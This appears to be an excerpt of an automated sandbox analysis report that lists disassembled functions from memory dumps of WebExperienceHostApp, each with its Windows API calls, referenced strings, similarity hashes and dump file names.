Instruction ID: e7e57fe0bf835dbd0acec283d999cf9625bf6e2e88c654793f010a3a826e1cef
Opcode Fuzzy Hash: e9d311e3a2d0453829feae00b2cc32a2770a8b394b8cd978c89192b67e3cf306
Instruction Fuzzy Hash: DC716F62B1AB5699EB00CF65D4606AC3372EB44BC8F454036DE6E17BECDEB8D45AC340

Function 00007FFDFBA77850 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFDFBA77951
memcpy.VCRUNTIME140_APP ref: 00007FFDFBA779B2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA77A9C

Strings

0123456789-, xrefs: 00007FFDFBA778F2

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemchrmemcpy
String ID: 0123456789-
API String ID: 4232306570-3850129594
Opcode ID: b66fa995d862786ad70c83aa3692fa7ff2d0f80ca9987ad818803cdf48cd1475
Instruction ID: 38e054cdd41565100cd8dc7eef0cebbe654fefa2d93775ebab60365ea8b03702
Opcode Fuzzy Hash: b66fa995d862786ad70c83aa3692fa7ff2d0f80ca9987ad818803cdf48cd1475
Instruction Fuzzy Hash: 90718E22B0EB8699FB01CBB5E4606AC3771EB55B88F540435DE6D17BADCEB8D546C300

Function 00007FFDFBA77AD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

swprintf_s.PGOCR ref: 00007FFDFBA77B6A
memset.VCRUNTIME140_APP ref: 00007FFDFBA77C22
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA77D09

Part of subcall function 00007FFDFBA4B678: memset.VCRUNTIME140_APP(?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B71B

Strings

%.0Lf, xrefs: 00007FFDFBA77B5A

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnswprintf_s
String ID: %.0Lf
API String ID: 1248405305-1402515088
Opcode ID: ec13666b7fd0f09e99187055b236b0abcd58ba996a916074fadd5549c94d382e
Instruction ID: a49eea4b905511a18d6e100f0d0352c6219150115035db27c904a680de99f70f
Opcode Fuzzy Hash: ec13666b7fd0f09e99187055b236b0abcd58ba996a916074fadd5549c94d382e
Instruction Fuzzy Hash: 0E61C322B0AB8689EB01CB75E4606AD7761EB49788F544131EE5D27BAEDF7CD045D300

Function 00007FFE13204068 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132041E7

Strings

, xrefs: 00007FFE13204138
csm, xrefs: 00007FFE13204221
csm, xrefs: 00007FFE132040B7

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: 181858bddd0f771f635e266b645b507512d406852fa62591119b22970761e9c7
Instruction ID: 6a38bd7b0e25df89d7b08162bf7840841e4bc093128b0172f3e49d67b52f8e87
Opcode Fuzzy Hash: 181858bddd0f771f635e266b645b507512d406852fa62591119b22970761e9c7
Instruction Fuzzy Hash: BF71E536A08A818ED724AF27D5406BDB7A1EBA0FA4F14C175DA4C37AA5CF3CD558CB00

Function 00007FFE1320E970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1320EA30
RtlUnwindEx.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0(?,?,?,?,?,?,?,00007FFE1320E735), ref: 00007FFE1320EA7F

Strings

f, xrefs: 00007FFE1320E9AE
csm, xrefs: 00007FFE1320EA16

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 451473138-629598281
Opcode ID: 596fc2b158a4246977d309a96ad6f7813b01e1ac3dbcf012ac6f28eb0dcb6cc7
Instruction ID: 77fd3d0d5edf94def8dc63c0bc59b3530ad01e5c9e7d532d321020166fd698c9
Opcode Fuzzy Hash: 596fc2b158a4246977d309a96ad6f7813b01e1ac3dbcf012ac6f28eb0dcb6cc7
Instruction Fuzzy Hash: 7551C732A0AE428EEB14EB17E444A2D3755FBA4BA4F548170ED1E63758DF78F885C700

Function 00007FFE13203E40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE13203F37
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE13203F47

Strings

csm, xrefs: 00007FFE13203E8A
csm, xrefs: 00007FFE13203F99

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 6cc9a4182677805c38e53337c324a2a6144c6831a4eccc363549fdf53aa87d8e
Instruction ID: 0d41fa8bb60a965e1b638121b5a8c7cb9579143fb167e293bcee0af0a03980ab
Opcode Fuzzy Hash: 6cc9a4182677805c38e53337c324a2a6144c6831a4eccc363549fdf53aa87d8e
Instruction Fuzzy Hash: 8C519572508A828EEB74AB13914426D77A1FBE0BA4F148175DB5C67BE5CF3CE459CB00

Function 00007FFDFBA42560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA425A2
RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFBA426B8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA426DD

Strings

csm, xrefs: 00007FFDFBA42606

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Exception$RaiseThrowabort
String ID: csm
API String ID: 3758033050-1018135373
Opcode ID: dfa6e63e12c7d75b43cf8b279f64167cec423cec088571d2c799f5e25e408b82
Instruction ID: de31325038b59ac3894ca8c3909c9f6783fd835a756b37fdf8460efec88553d7
Opcode Fuzzy Hash: dfa6e63e12c7d75b43cf8b279f64167cec423cec088571d2c799f5e25e408b82
Instruction Fuzzy Hash: 11518122A15B8AC6EB11DF28C4602A87360FB58B5CF159321DB6D077AADF79E6D5C300

Function 00007FF625A16AF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF625A16B1F
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF625A16B6B

Part of subcall function 00007FF625A18A00: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF625A18A3A

Strings

Local\SM0:%lu:%lu:%hs, xrefs: 00007FF625A16B35
x, xrefs: 00007FF625A16B2D

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: CreateCurrentErrorLastMutexProcess
String ID: Local\SM0:%lu:%lu:%hs$x
API String ID: 3298007088-452036900
Opcode ID: 0a12aa2f88bb20d10652bc4003f766e7430386beed50e6a6e1fb266b87b09c82
Instruction ID: b7ad50cb501674d7acdcdd8fdbdc6b53f3774068737920a40b050eaec368945d
Opcode Fuzzy Hash: 0a12aa2f88bb20d10652bc4003f766e7430386beed50e6a6e1fb266b87b09c82
Instruction Fuzzy Hash: 7F41423261CA8281EF60DF25E8926AA67A0EF94B80F409035FA8EC7B55DE3CD945C741

Function 00007FFDFBA643B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFDFBA5A86C), ref: 00007FFDFBA643F1

Part of subcall function 00007FFDFBA4B610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA71D6E,?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA4B63B
Part of subcall function 00007FFDFBA4B610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFDFBA71D6E,?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA4B657

Part of subcall function 00007FFDFBA56EBC: _Maklocstr.LIBCPMT ref: 00007FFDFBA56EEC
Part of subcall function 00007FFDFBA56EBC: _Maklocstr.LIBCPMT ref: 00007FFDFBA56F0B
Part of subcall function 00007FFDFBA56EBC: _Maklocstr.LIBCPMT ref: 00007FFDFBA56F2A

Strings

$+xv, xrefs: 00007FFDFBA6445F
$+xv, xrefs: 00007FFDFBA644D6
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FFDFBA64466

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstr$___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 2904694926-3573081731
Opcode ID: e76dbe75405fbdaedae8952bdfdeb617f0b0a78e7a50d76c276933190faa78df
Instruction ID: 2260755a81404bc7dba984431c9ab69e4ca3a599614159eed173673065d56e82
Opcode Fuzzy Hash: e76dbe75405fbdaedae8952bdfdeb617f0b0a78e7a50d76c276933190faa78df
Instruction Fuzzy Hash: 09411372B09B829BE724CF21D1A196D7BA1FB45780B044235DB9D43EA9DFB8F562C700

Function 00007FFDFBA4FA00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA4F984
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA4F996
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA4FA1B

Part of subcall function 00007FFDFBA44D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D32
Part of subcall function 00007FFDFBA44D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D58
Part of subcall function 00007FFDFBA44D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFDFBA52134,?,?,?,00007FFDFBA4439B,?,?,?,00007FFDFBA45AE1), ref: 00007FFDFBA44D70

Strings

bad locale name, xrefs: 00007FFDFBA4F9E5

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: setlocale$freemallocmemcpy
String ID: bad locale name
API String ID: 1663771476-1405518554
Opcode ID: d094a8940004dce9378923e4909419ca7b3449e962a542eb783f077e1d48bd15
Instruction ID: d4957623cbe58c8d660e361d8e65ffffb9aded03515eaf03497f0b204d2f8316
Opcode Fuzzy Hash: d094a8940004dce9378923e4909419ca7b3449e962a542eb783f077e1d48bd15
Instruction Fuzzy Hash: 3A31F622F0A683D1FB548B26A47097D7291AF84BC4F189036DA6D477FEDEADE5818300

Function 00007FFDFBA74E34 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,?,00000001,00007FFDFBA72CE8), ref: 00007FFDFBA74E75

Part of subcall function 00007FFDFBA4B610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA71D6E,?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA4B63B
Part of subcall function 00007FFDFBA4B610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFDFBA71D6E,?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA4B657

Strings

$+xv, xrefs: 00007FFDFBA74F5A
$+xv, xrefs: 00007FFDFBA74EE3
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FFDFBA74EEA

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 3376215315-3573081731
Opcode ID: e747cb05a516fb7cb06c3540bad08c0af1c8a589c04e394ce18014a6d7ffc13d
Instruction ID: 8dfc045b05451cdcbaaaa3a63c2627116d04f430478b2f03689c05dbbbb7f40a
Opcode Fuzzy Hash: e747cb05a516fb7cb06c3540bad08c0af1c8a589c04e394ce18014a6d7ffc13d
Instruction Fuzzy Hash: 5941D332B09B829BE724CF21E1A086D7BA0FB44B857144235DB5D43E65DFB8F565C740

Function 00007FFE1320A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1320A494

Strings

%lf, xrefs: 00007FFE1320A4DA

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: 3f49dcae742c8bfa69eabadb2c79b2d4ceee00cf0999bfe9215d1b8c6cd360a0
Instruction ID: bd10e4a0dda1ad2888f593a31d3fe0c7080dd2748f2a76a579b459e5df8777e7
Opcode Fuzzy Hash: 3f49dcae742c8bfa69eabadb2c79b2d4ceee00cf0999bfe9215d1b8c6cd360a0
Instruction Fuzzy Hash: 2531967290CE8189EA20EB26E45027D7760FBE9BA4F9442B5E99D57665CF3CD409C700

Function 00007FF625A15108 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,?,?,00007FF625A131E9,?,?,?,?,?,?,?,?), ref: 00007FF625A1514F
GetErrorInfo.OLEAUT32(?,?,?,?,00000000,?), ref: 00007FF625A15182

Strings

combase.dll, xrefs: 00007FF625A15139
RoOriginateLanguageException, xrefs: 00007FF625A15148

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressErrorInfoProc
String ID: RoOriginateLanguageException$combase.dll
API String ID: 4049917127-3996158991
Opcode ID: 7466db823831db908e735f918de8e8c27db00bf53b94701007ad3cb2b1cff79f
Instruction ID: 1b98ab934e0bf93ee78b8f439f3f15093a4f9d8a3a42f142115fa19fab22ee7b
Opcode Fuzzy Hash: 7466db823831db908e735f918de8e8c27db00bf53b94701007ad3cb2b1cff79f
Instruction Fuzzy Hash: 7C313A22B19A1694FF219F65DC423BC23B0BF48B88F448835DA0D96695EF7CED44C752

Function 00007FF625A17900 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A17983
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A1799A

Strings

WilFailureNotifyWatchers, xrefs: 00007FF625A17990
kernelbase.dll, xrefs: 00007FF625A1797C

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: WilFailureNotifyWatchers$kernelbase.dll
API String ID: 1646373207-2571501353
Opcode ID: 9a7db6e43057bd728f2ef62b898599da06f6ef90415e870cb48878db2bb90548
Instruction ID: 0e5ba08a7e11029b583e5c69a3b85cdade57bbfcd6845aefe800dce64fb141fd
Opcode Fuzzy Hash: 9a7db6e43057bd728f2ef62b898599da06f6ef90415e870cb48878db2bb90548
Instruction Fuzzy Hash: 31315036A0978185EF748F29E856139BBA0FF48F54F449039EA8E82764DF7CD944C711

Function 00007FFDFBA4A3C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A3F2
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFDFBA4A423
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA4A442

Strings

., xrefs: 00007FFDFBA4A3FC

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: FileFindNext$wcscpy_s
String ID: .
API String ID: 544952861-248832578
Opcode ID: e8055660fd5f3a0e6e4367fb8295474a2c920e569d81a9d24aaffc670c06c300
Instruction ID: 944d553b317c989bdad91e5bdc9c79072821ecd3d8d00df25a7c6ee1785906c2
Opcode Fuzzy Hash: e8055660fd5f3a0e6e4367fb8295474a2c920e569d81a9d24aaffc670c06c300
Instruction Fuzzy Hash: 1621C222B1968385FB708B11E8297BD33A0EB48B84F544131DAAD43AF8EFBCD5458B00

Function 00007FFDFBA46BB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA46C62
std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA46CA5
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA46CB6

Strings

ios_base::badbit set, xrefs: 00007FFDFBA46C40, 00007FFDFBA46C6D

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

